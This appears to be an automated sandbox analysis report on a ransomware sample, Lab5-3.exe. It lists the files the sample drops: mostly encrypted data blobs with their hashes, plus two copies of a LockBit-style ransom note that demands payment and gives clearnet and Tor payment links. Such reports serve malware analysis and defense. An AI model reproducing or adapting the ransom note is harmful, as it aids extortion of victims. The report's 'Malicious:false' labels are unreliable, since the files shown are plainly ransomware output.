                                                                                                          Malicious:false
                                                                                                          Preview:....d..<....T..q....7$P......;...V......_Nb.V..x..X.......u.(v.....9X....K....V.u......[6.q.5....2..L...b4L%w(.+?. r.. .."t.2..[.4....%.>q._^.G].z[.Dn~........?R...$......./I.+.i@G.b.V..?`.{....P^./=.I ...u.... .....Y.3.R..2..J@...0..J.."..^^...b..f@...pl.A....8..T.a..y.,9.w..?.Ao...m....)...A.-...c....q.u2+.X......$..].s...i....2.....:...t}..K}?....Y.%....|..>..~.O..C..\9.W]..{.J01S..i.3...0...+..g..v..f..t....t.,|cD.39..j.....w...3.z.0.......U..<..eKA...&XCIe.]bL..h.o.NO@R..MjuD.w(8.....:....t=...;.;.d.....n....B?.....6ZT 2.{....':.1.=.......*}...x...z..M..M1...=NV..m.K...[F>.V..n....U.|....Y.i.......V........eY3"6..:Ll.c..b..0+Z;.x,..K_..2..@$.....A......6d..6../.>..M.X.1.'...5....9...RV.:.gFT~....PB.._.5...It`.NJq..l0........*a)....\..4e.MW....?....8..?T....2.'...^y."....-...*.p.....lb..jXY.c5.X&.4.-.%&...iE.KO...cm.....!.sJ)6q..zM...%{.P....uYkIG.D.id.......%..&..S....$.7..SRs.-....d".:Y..q.B....d..-.....ZS[.0.P.z..V./t.I/9O........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.935360042225937
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:222+IvQAQn/PHgafY2W7sGfjPIrHfUTid3hBaUoSGFcmeykEdEElU92i:222NQAQn/oaQ2abzGx0uKeY2ElUJ
                                                                                                          MD5:1C35380E686C78FA0251A09FA488802A
                                                                                                          SHA1:EDC33CDDF5AA0776FB17EC6CCE13C513847D284D
                                                                                                          SHA-256:953FEBC90866DFF7C809713ACCA28EF62B611D45749C5D03C01125D94A4C013B
                                                                                                          SHA-512:C3A8C9B956A066AAC5DBB93D3C5E4C260C5656EBC8574D19A18098079616B87F33D2098CBFF099E7A664A1D55CAE205E31DF68B7A3F41FFBE3710385B9BB1113
                                                                                                          Malicious:false
                                                                                                          Preview:v..j#..o#..[.'K.x.?..5....>..4".Yb?..l....m...K.....H.....W..uc.....N3.....>....h]..N0.......O...!r..|..9.."..V..*..~.s....I.gY}..H.*.b..a....cus.|g.......0.D0.....O.2.....dY.?.....An..z..7.G.....T.l.\.......(.ht..7..z..G...hd......!.8....w:6....d...N..D.}.S..p..=..j..n....d0w.l]wC...CZA..w..(..75.B......8.q..Sc...M.en#F...D.g.fI7\...... ..g..P!.c.n.Q....3.]#:/.9.].oy..*.').s.R.@.6....S......m..$i....K.9..U.k..)%.....{NL.TS[c.....:J.Q.........d.PH.9>................+..G.0..j1.a#......dP.F.m....(!.w.:...$..w.`.H}...4.K.i........a$...Z./..(...hE.."f.V.t.;.j..8._q....U.:......GW..|<...g.k.....1.L.H..o.}..:~SD..n[Z.N.7......"..IWQ...{...!.R.Lkc.v,8..-.P.>.~D.hp......n..L9......G.....'M.j...\.&.f.R..|dw.w.].....,+.."E..^^.6h.`.A..S.z...@.........+...|.$...5..C...SAw^.....Ki.1..rf..63I..L..o.....^....;.T..y.B.~......?.+e.V.........^0%.T....\Ik..B....bP..v{.@..._a....sZubk.......2.>y......_.....?..z(..C.).q..D.t...v.L..=\..&.".....4..6.6A.g..(.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.933000660866191
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:YSCgZDgcNuWpdFBFbO/36InzrBxxNWDHfUTid3hBaUoSGFcmeykEdEElU92i:RLZDgQuSu/36InzrRpGx0uKeY2ElUJ
                                                                                                          MD5:74BB790B797BA8CFB77840E84AA051F7
                                                                                                          SHA1:63B213610B388DEE7F12619D44E861EB415BDD48
                                                                                                          SHA-256:CD13E6DDA07FDC3A140CE97CEC271E74E874AE6CB895C6065EA05E2643B68835
                                                                                                          SHA-512:2013F1C7EAE0FD2F3E23BC0D656A6ECBAA93D463E6D9C9E391B9ECF71E78BD349E4F02B9A91C0ED2A11DD8D348257901F055C56D98B4530A8A3729B292428A33
                                                                                                          Malicious:false
                                                                                                          Preview:..!....}.-...Hp.3.Duh6C....(...D\$o.D...K....O..g.e~"..Y......g....../M........\C...}4."}%....[..%.....m.....!.w..>..m1.,.".gS..... .4k-.<t)RT._.......`..*....1..gu.L|...1E.a..{......G1...[....GuB...N...5F-E^*v.B.C...K|.G...+G.s....'.....!.9}.....2.0.!2....b..0lJ:...6.....B.M.....7..n,..-M`.0...H..$dn].....8.).....R. P./....b...8Vp..$w.L.n.o..V}._VZf?.!.>..$.h..;.Y.L.....b.J."...E..m.H,.......H..jfv.t<k o._} ....,y..........o...Z$].........z,>V....\E..b..Q.9...@.....r.|...<.nRg....j.&V9...>...C..?.T..........l.s.l.......,.s;...[A.{.!...4.=.._..?.#.G...#xY..$.U..W..S....''....`B...j.9H.......?.x>.-..C.9vj.S....k..K..yM..Mu.......TY...ImS..N.{......s......5.NT...qJ}.U9..k..7..Q.X@X..>.'9..3..~y..y.`.n...m...tG.H....~T......p.>.i?Fh.#.=>..U........wZ....lQ...U..=O...K......#u.S....+...h'L.aD[%_...K.......d.....$M.)...[....".:7gc.....G{.<.....d..h........&Z......f..HQS....UQ..p.F.x...Adt.#.|..)..k.V-U..G.;Q."...(.M...........6.......{..0..-Ch;.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.924243288249278
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ueW0hp5US3zF0PrgYDKt9lg27niqakxTTSnF7HfUTid3hBaUoSGFcmeykEdEElUJ:uevfFAmtn7CkxTGx0uKeY2ElUJ
                                                                                                          MD5:996D389D8D6C272D797F2E378797C42A
                                                                                                          SHA1:B52CDBD23B587941164943DFC2899AAC41B453DB
                                                                                                          SHA-256:325A02ABD33A07C353D3BF9C63F02D4B877F8F3445B4E2727A78257150ADDDE8
                                                                                                          SHA-512:F49FBA0A8749DEE9F010BEA385890C5275B62D49D7B873D3E377F5FFF66CAD9ECC66060AAABDC2368F71A771214A54EB432FC2ACA395358C0BDD56EFD7BD23DE
                                                                                                          Malicious:false
                                                                                                          Preview:%..7..`z...8.......1.R..O.cc......=.0R...5..B..T.,I.r..P.4..Lr8l#...W.i..$g...^R.A......F:.....~.........l......%.7...w..d.HD.#.rdO..x.o.A0]._d...5.F..{.....b.z..oz6.....5QE....3Z:.....A.I.|..T..w..>..;...1=f?..$.u.q...2.M8..\.`.99.K.z;d.0{7.....ub6..O.W.z..xI..}...3.t."Z;a?.?Y..`8d._.V....w.$.....6..5D<.jn4...G...#W..._.E..~......6..'m@...H.=9.....$... .2Y...O>-e.x.'...Z..u..Q..}...q0..O.}.i.>....m/.].9._.x?.....$....b..d..u..#....1-..;.*}Lj..D..o\.D..q}..@...m...]s..ic~%Rw.......V....... ....^.HS[.S......1.{.t.[..`k..1..z'Oy~BIx..RHUV.d........qY.?...,.^...eA..N...E...>h..k...k\..M......[.K.._1.......l.IP<..JbOaV..}`..C.`.<(...b...R..*.......g..I..Q..H.........c..S..NU8Y...#.9a.wc...k.....Y.Q!.Z.....'.V.k.*C}....>.B.......T.P...R..p_..#u.u..D...<..B]>n..O....i............q..Z..kc..y.g......Q+.....|.........O.+..09b.F.......J}..P?e..Rl.,@}!Da3Y...[.S..G.....m.i...y..R........Gm.3f...y....~....#...E.t4+xxO. `.R.@.^ 1.......z.x.u..;.z]R
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.9318055530300615
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Ts3labz3nAPXK8amCmu3R0z4IElHfUTid3hBaUoSGFcmeykEdEElU92i:Ts3SAC7mu3+UIE+Gx0uKeY2ElUJ
                                                                                                          MD5:C638AB3234755175555B6C6CB12D4717
                                                                                                          SHA1:A88F253350D9B743775FC2DFA8BA75E6071D32C4
                                                                                                          SHA-256:F1C487B7FBE8A998EE6DBFFC56AE0BC818B85FBB1AB07E0A71E8BD6B014F51D0
                                                                                                          SHA-512:E60E4ED7534E67372AA979C2579102BFED88AF70A9C6FE2AFAED8B6EFCFEC42F188A20DBB15027A5897A344B7FFC0CE92AA8BEC2049679CD66745BE58C43D9E2
                                                                                                          Malicious:false
                                                                                                          Preview:.. S..f...a...<.W.3&...!...m..*G....R......>.7x..k....W...g9.......$...5n..X.4.n...3..%...H.I-.]..7...5.Z.e..f...o..s.....6.D.....m.R|^...I...H_..-{.v..\.......i...E(^.X..-.3<..r..Z.`...Y;...`<R.c.S..~......0.|..`....I.-...k.d.E.d...(.:f.Ux...<..UD.n.%.Q...1`H...I,U...A:<..9.^|.. .!..Q.....)B...8.nL.....6...h?'8..X..-..|"...5./m..k.M..|....0.Wxc...#q....`.......I.+N.I..G...p'~...e.LfFxlO....OH...@)..mg..=]\.....%....-N..;.cnp9.@l^..b........y.b.......+T0o..[W.f.....Ls.%...i..5Z[.M{e:Jq..'.nI.d.....{G..9.r..F.b?.=..N.&m.eI....e..$....4.`8.)...B~.Ei.".YE*..PN<L.e.)jP...u.J<.s......L.$...>R.@E..9T..........{[V....c...n'*..p:.C.....b%wS.%UF...D%.`.=..p..3O?....t....(....<...v#x.....E..C^.HK...;p.4-X....+..W.&.....`X.B..f....6..\..9.r...`.....J...lo(.}.26j.A.<-.l\.....fQ..C.r...2:.]66.z.>|R.@.M...R..y..hg.G....6.j..v...........T7O.-.!..:..L%..n&..|..I.pM.&%..O1..N.D..#N....a.y.W.....A....v.*..0....`(.(Vs..B}...#........b.~.#.1....q.P.Vyh
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.927979130535715
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:hOw2b5N5Do30luWgaW/KdXoyOi9pHfUTid3hBaUoSGFcmeykEdEElU92i:pm5L7fgli5tOi9qGx0uKeY2ElUJ
                                                                                                          MD5:44C95D8F053DB8E3CD51F3044D5FF4CB
                                                                                                          SHA1:8E5B2CF35293348758B58CCDA710DA93B97E64BC
                                                                                                          SHA-256:C38581126627B4D90AAC832B78D635225DDAB8ED49FAC3C068A7A74AFA88D162
                                                                                                          SHA-512:D9F3550B175DEE2F4A98329CE4DA5B2047D13782C8C6064E034679407786FD35FC348045D82A55755714F82312ECFC2EEB43B005D6AF4DE24B806136A0A62079
                                                                                                          Malicious:false
                                                                                                          Preview:..T............d..+]..]}h.3S..+.[.\.0\..+...+'u....z/.............u.3......\.t.$....H'"V..h.../.....[....D....,.L=F.....W....a..h..{..p....(..0@>.2.q4i..M..y.S..P..V6...... (U1......#Vpj]U\F...9.ru)6..D.W.....).q9I.B.?...2.....E..F.<+O..<..".`0......Al.QS.>R0a..L.....skU!;.e...V|}P%M~.t...8....sb/<...r..P.... ...G.|H..i=. .....5B....Dw*.I...RI%.....~...].f0C..^.....q.K.......c..t...w.....}...|.*nU..Pv..0.[.....2.u..E.4.5I.~;8A..-.X....<gqb.?.'1.6q.%.m`..X..%.U.n.,.U.....c..d.W..8P.M.;.@....e.>.....S.8.^+.......rR!.....7?..<..'.i.%%3.-.~Y..-;&......:.W....-h)....x.._lWu/h..a%.0.|.. ..A.%.I.....r[..7Xf..Z.A.Q..~...(B..67.M..+.R.....G.z<./......3...hL...2.....Z..{.g.../S#...l.k.i......^*=....-u........t..3..N...3.....j.z.^...E.j/......O...|........\.._.N1.4.*.wU5...M...Hl.|d...@....y...0...BT..2...Tc+/:...........fi.M.;....3..N.m...N.J.*|............~.(."....;.x.~~o5.z4A....L.!..9I..$...B.C.....n.J.,. ...L....^....(.....T...P.%..1..q..m.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.932617072850666
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:grBKrmuw+A4ECN/MdJiBAIHfUTid3hBaUoSGFcmeykEdEElU92i:gpf+MWKJi8Gx0uKeY2ElUJ
                                                                                                          MD5:9A6E626FF33AB41A2253AB9F332809ED
                                                                                                          SHA1:C118A5705646DFBF0864B27217448B00AFEC5631
                                                                                                          SHA-256:7775A3C468FC2184765D510E7777ACAFE90D28D2D49019D930751AA7D5055E95
                                                                                                          SHA-512:F336D22BBCF6446BC149A02B4C3979CAC6A659083D70E052CE815113E23F6047849B938856FBD1A46EBDE6BBF3467676219A2ADD918C7CC6590A3A4C4B11A1BE
                                                                                                          Malicious:false
                                                                                                          Preview:.D#.s3.@+i.|.ED.q...IGt....%.v...b?..g......cGx.4.lx....=b.A.g.?.'.+;..Fg.P.1...,C.^...G...LK..t..\k...^....q..'V\..w=...U...Y..].?d.?...&s.)........porx$.....fY...X.F.E....?.L....W.....|E..8Y.....(.5...4.$..G.?..Y.....f..z..u/...g......h1.B;)k.GNm..{.p_.c.c.}iw.&:E{...4.n.&N.....9.x..-.a...8<..]n.#E._.5.......>U..>......yV...x..pE....8...g.4;9M. ....SC......;.....p.\..P.T.!.s.p5K....th{I/..g1..A]..F..t./M-.A.........u?b..+....<....R*..K..._JB..R...P....Y.6.....R....@.w./ ....h..<%....(..V,.S..Q.1.;.E.P.A..]..R8...c.......5.s,.P....7L...".a./B.....x%.G...e..D..$...Tch...Q...F..[..Q.pi....e-=}.4W......H(."..-..p.....Tq,R...46.h.W.A .2N.W.....@%.t....).M.f...x.... -..Z. <.6...b....&"f:.2.."...b......48m.2..d;..s.....X.....S.R..L......b..I...N...&.}J...?.....9.......U...D......!..$...b....+k..QLa8..q;.....J K.vIp.....e.*.b..P...?...v...V.&@..%_N..xJ.K...O+l..t-..6....J...=.....oh..9e....N....9f....e....,O...+Bt.h%...$..u.#.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.9299018590565336
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:lmuJa3YAsyD68eeSW0HBCJtc35bHfUTid3hBaUoSGFcmeykEdEElU92i:lmga3YA/D68A78gyGx0uKeY2ElUJ
                                                                                                          MD5:E77E566CCFAE2F4B062115B88D1B12BE
                                                                                                          SHA1:6AC6CFC17C371502ACF707E3DADB4C2D9ACDCCC1
                                                                                                          SHA-256:1ED84D1EF00E3F8BB0673A3B1A04E65E631C57E62404DB8BF6E777663FCF7D57
                                                                                                          SHA-512:819BBAA0FA8A105F88A009B2C9114C9072F8E1CB01DE286241639664C952A85787C46566F2462DC2F0B4A7B736435568766A25080882704B1F4FA7D0894FC8F0
                                                                                                          Malicious:false
                                                                                                          Preview:..M.y.U.b......ym.n...+.M.).}`D..!..W.. .../8.qy..6......3...5.Pr.x....m......5....f5A...w.K...f\.#x....`Ir.'P..;/..[T7Ha...V.......`.Zg?F.....i..u...h.n.L...Y>.*....}...4..nw.q...4.q.U.X.W.1.b.L....]{....X@...b....s.`.%......Fk..Wsr..j.|R\.....ew.D{.*$.b.G._l.z.+9.G.~..G6..f.:G..g.o...fj.Y.X..X......6..YC..dv{..9w,.r}(./..\[.1).[.x^0]...W.a..Av..3e{."...D...4;.....Kv.... .B>@n.|.#.t...>.....%O.......E9....8.q...T&NS....k....p.?1k.*...3[.4j.=c.K.A.D..r.V..LL.c...h3.(E..^.....S.}.GI)K..C.{0B .+.Hq[&._&].1......ZW<.A.A.[c.......)...z.T....Tgr..$:.....u.4t....f.J..FD...d.s.q......-%.9.?.......:.s?yw8.|I.h...j..#..9H....yU.p....T......^d.... .3...x..a.+.....7. .r...=.o{..`..V....:O.....^r..*r.R.....fd.e.hF.....$...g..a..2?...L.;)6k).3..t...f.e.>z..`..<...."|..a....b..,....V,..LZ.g.=7.(......./..8....@.@s.FX.>5.....~.....L...&H9.....Pi.jQhX.t6.e...;......69^.H.!.K.o..G.....<%.B..AcrR..K......4...;.....x.,}....p.......mI*xb.UT...A...#...m>.{\..=...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.929510314317378
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:6LUUU53xk2S3OtYaPmCV/+RouHfUTid3hBaUoSGFcmeykEdEElU92i:iUUU5zS3DCgRoBGx0uKeY2ElUJ
                                                                                                          MD5:05A3B0EB1F765B675F7FA356C3826FAD
                                                                                                          SHA1:81849E6EFB50C3BE34617A0E5B7B2A803A67575B
                                                                                                          SHA-256:F6780C56DA0ED9C2E0AAE50974F72E255BD61D8243C89E452F78B03F30EBA384
                                                                                                          SHA-512:99F73102F5065B94A51201397711692B353F014DA7935D1619C341F8813B0E3DFE97694F5BBCB9A6A50731015B6D4925F73648D02BA9DB9D87C2FD42582095A2
                                                                                                          Malicious:false
                                                                                                          Preview:.".I.N*b.....".).6..Tb..D./..M$X.{..`..2.....]..........r.-...f....D]..+..u.wGz0....&....#..D.......\.N)2.........O..}@..~_.Cd...=...O.D.%......_6.mxj.3.8.>.*.f.Y.d.x..3eJ.RkL.7/Ae..I.0J.....T.3."n.....q..Y."L.F.Q..1*or....l+.'|..<=!...{k../N._'...]$8\....2.Yy...L.......`...L.@..........f|...Oa.................@tw8.6..{...]...t.......Y.f.......(..cb._..4.,v.Jf..H.....e.#.H.!K`....`....pAbLz._X...i.s.8u.Q....D.M...U}.>.|.[7.,u..>.*T..g........d.T%.I.K.....(h(...$@M....B.....`...L.'c.Z....e.&P.h#;=..qU.22.#...j..F.R....xai..^`?..x.......F..qT...).....e.ox.*..&=....fS.nL.T.j.........K.....?W.....#.\{.!....E.L......Y.kN..a........39.PJ..9q.A..B_.[\....s...x...Xo..H\..C..|.XA. .4...`<.._...W....iX?3..b..trU..r.h.....m@.......mp....+...^.......[...I..r..Ov{|.[?}..,...8t.J.(.w.hU....Nvl...R..X..>F.J.y.6"..".x...-..}......=..R...}.^....;\.....1.i.o.^....$r'..u&h..x.t.......8....w.,..Bj........z|.<C......^.s../=/..%.4.O.I3.+.a....1.......6.d..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.936580779937937
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:oLQMMkZtxzw9X+1QDYIFH2fc6HfUTid3hBaUoSGFcmeykEdEElU92i:oLQp6LoZDYMHBGx0uKeY2ElUJ
                                                                                                          MD5:822BE9DD3D9E72303F087E5A3972A525
                                                                                                          SHA1:BA2E398F2C5C3D55871647069DB14825BDAC67BF
                                                                                                          SHA-256:8521C4A907D631108463641221AD41D94F5708C8A2B320ABD9967DE21637CFF1
                                                                                                          SHA-512:3F36B967909B2A831418F7CFD6CDEC0D42F50233AB66B86DE8981F8468D02B87075E296420B73CA0B716006AF8A53B169743CB79A76FEC8D8805DA9C55B4859E
                                                                                                          Malicious:false
                                                                                                          Preview:.U.g..@Sa;4....x....S.....J...z..cw.^KwP..gKqG.%&.Sja..@5..rY8.j.....z...TT.D.v..g3t.t..(F...x...V)^..{3}..f....>../A.cOj..c.t.b...kZZ....J....{.)....h...U,.(O)=q."..t..'7~....~.~{._.n.$......H..m..r......O...Y.o'.Ks.J~.9..9i> g.Y...'R....pr.....f.....7...UR..b.avjc..v.@E......".A.G...hr`r2E.d..c?..t..5.P.r$Tv1.:1:...2.gn3........AR..K..}yr.....g&q...~I2.L.R.s..R|....hA./.v..%Ta.T..5...|V.i..s.N...q.2.0......h.qc...{.q.....aI4C.Z...|C;.....o.QNp..q.......Q..<u.;...qP.....r>7.n.p..F...s.!...=`B..Y6~4..vdY..jR..L..^MX...<...k..az...[.......c3..j..Y.]q.pG..c..4......~..&X3...!..|.. ....+ ....77~.J..}..?.@.m..n..W-CK.....N..].R...If.3.g....?..Uk...A..g.S.D&O.S.?.{.1...-'.$..{.Q..W...d...{Q......d.......nD.4kj.Kpwe.YpWA]&B.30.."!..V...rY.r.5.Q5..et8......ZJ% l*X.6TX.Z@.@%.N.?^...D.8..$.]L......$..n..0#.Z..._k.JF...0.2F....<m....csv.U6A.=...'V......x..>?.z"...T..-.........*/.`........v......CYA...R...d..X.....T:.......l.....U....y....H..8u+
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.9328476445549745
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:R0xuo1Oo4gr32EN21RYuHfUTid3hBaUoSGFcmeykEdEElU92i:q/1j4832EM1WGx0uKeY2ElUJ
                                                                                                          MD5:6128118C50D52112DFA6A72CBAFA39F4
                                                                                                          SHA1:8722A09C6DD2BDE6F328E58DA4BB35C5B29965B0
                                                                                                          SHA-256:F995940024DEE16B7ED274249FD1E702C690D2759E831F0513A07439D04AA3E7
                                                                                                          SHA-512:BFE3152D469D7E0043EBDC506B9425814FC7A874C24BBE715AF3DE7406BF483B9A4B7FDDDB74B3B1BAC1F28140123545456ED02DF2C42C90A8A9381EF0981507
                                                                                                          Malicious:false
                                                                                                          Preview:mx.......Z........ay..v..e....N6......B.....|.v]0[......,g.:$S..T.}.r:G..3M...@..z5.K.A@.+J.F.I..W.W.k.6..F&.O...l..F...*..&'...6.............. ..'Ms............2.mF$:;......t+m.p .vB...`.%..M...>........Z......{).3.u.3.O.w.{.l...Wi.v..:..j./,.U..D....."..wZi.......b..>6......uj_j.k...+N.f.{.`6:.clA.{'`..?..q..`k\.".%..).[....m'..cE.?.].J.R@.x.#..e.]o{..v..d..M.I..AFb8.9H..P,.Q.i"i.,..X.n.....gz.;.&7..".j...O.n..x....C...B.......`{F.6...u...pL.....`[{.....d..q*%f.)..\...O.,..u...C.fk..dR....,a+D.)E~.}..D1..Lm.....R...?..+$n9.:h.4.FYw..W.6.....b..S..?..........#0Z.(K....M.B}.u.13X.....Q.*:.$@....`.F.....2m.e@B..V....G......E.}.b9X..14..k.BB.~etF4t.A[.Q...=..'.......d5.6.....t../c.P.w.......*.].s...4.....p......B"9%s%U...Q.......>&.f.%.M....[..Yw..*..s0....@a..I.....A.]<3..O..:....S.UxV..!:../...M$..J...~.....[<yz3......%...Q....x..R[....\%.W...W4.7...=.EZ....cr..e...{R....|m.....A....'..;...*...8..!"........ .=.8|.O.s#.K>...T.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.929342990079
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:+ZLKMUVF6CH62yJpqePdReHhmTzBPDOQC/HfUTid3hBaUoSGFcmeykEdEElU92i:+9KHVFzHrAReF+Gx0uKeY2ElUJ
                                                                                                          MD5:F2F9A70FFDADBDAA552CCC61E1F165BE
                                                                                                          SHA1:5E356DCAC0C5C466AD513FA478DB1BE6A2479315
                                                                                                          SHA-256:9672A1405FC4FDE02C604296056F7E499826FE097EC8452733291BD976A0E906
                                                                                                          SHA-512:819F7FC89177791DA8E1EC8532FB587D8852BE9221359F41CF1306C0AFED143D5C1EE012B69FC3483B0B5207F2DE600FBDBAF99BDD85EE2216998C3F04BD24AF
                                                                                                          Malicious:false
                                                                                                          Preview:>....Y....1 .....:..@..Y.9....Q.........]..h.(.PGnv.Q..2d=-.c[w.....O;[.....|Y.eM.]]..31.-E.|...}s.}.;...0.9U!P.?.a ..s.{..........R......-..n..5qi`4.a>.<0L....B....D'.{Y...^6...._I....0G.2.Un.....[...i."<%...|tZ..:.+.~...S...tp....-.].X.6..O2..0..jI...).....\. .\.U+....o..D.bU..]..%.V........R.:|..@....}9.-}5.WJ....}.$..{..z.7...BR..Y.........].a...../.........d,J...Wn....t....B.mr3.w3..'S..E....pen....g...r..u.aj.$\".i.d.p.Fm..6.....";......m4:.Q.k.. .t.c..........r...{C...p.=..._2L.f.wB.%..1.|.\Ic...!.y..(.5._..2...x.......C^q.....:.s.4.r:........6.8!Z..\.#U...[)...h......X.......kw=...-_.e.......A U.eA..=[..Jb..M..FE...R.b.|Q...=..<#.7..P.FY._.Rc=\..>....yO6.lc.:..*...6S.\.*.....rr....(.D.2...Yn..!....N.IO.f}....!O~...!/s.A..%..3....#-F.....$....1l.PK.K.....l~.....s\../...(ev.....D...l>...L....]G../6.p....m.p..=.+ ....a...+4A...&..?..;Pj.D.....m4.'.:./.....Wa.."J.%.0.[.Ld@....=E/.P.\...P.:..l..4.]]..7..4..9...........PF.@)7..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.923678081224341
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:B7soa2pF/SvGnYbGfTE29Hf1SIJaqmRkDkwHfUTid3hBaUoSGFcmeykEdEElU92i:lgvGnPflmhGx0uKeY2ElUJ
                                                                                                          MD5:5929E6C81779D83D3AA5478CBCD9026E
                                                                                                          SHA1:7ECE2D386A0D2B06C9A4B02FF62220C0A8825CA3
                                                                                                          SHA-256:3A696E60459A7F18C4E7E5839627C2766D19FC49A9EDBB8AA761C86E94036481
                                                                                                          SHA-512:D4928AAE77486054A5EAD0B1F72B1FB079B546F0ACFC95EBFC8B6669A1852862D6E3160BF4916D6E1F19346AC7F7E798275F6E84B69729ED161DDF5730C32EA3
                                                                                                          Malicious:false
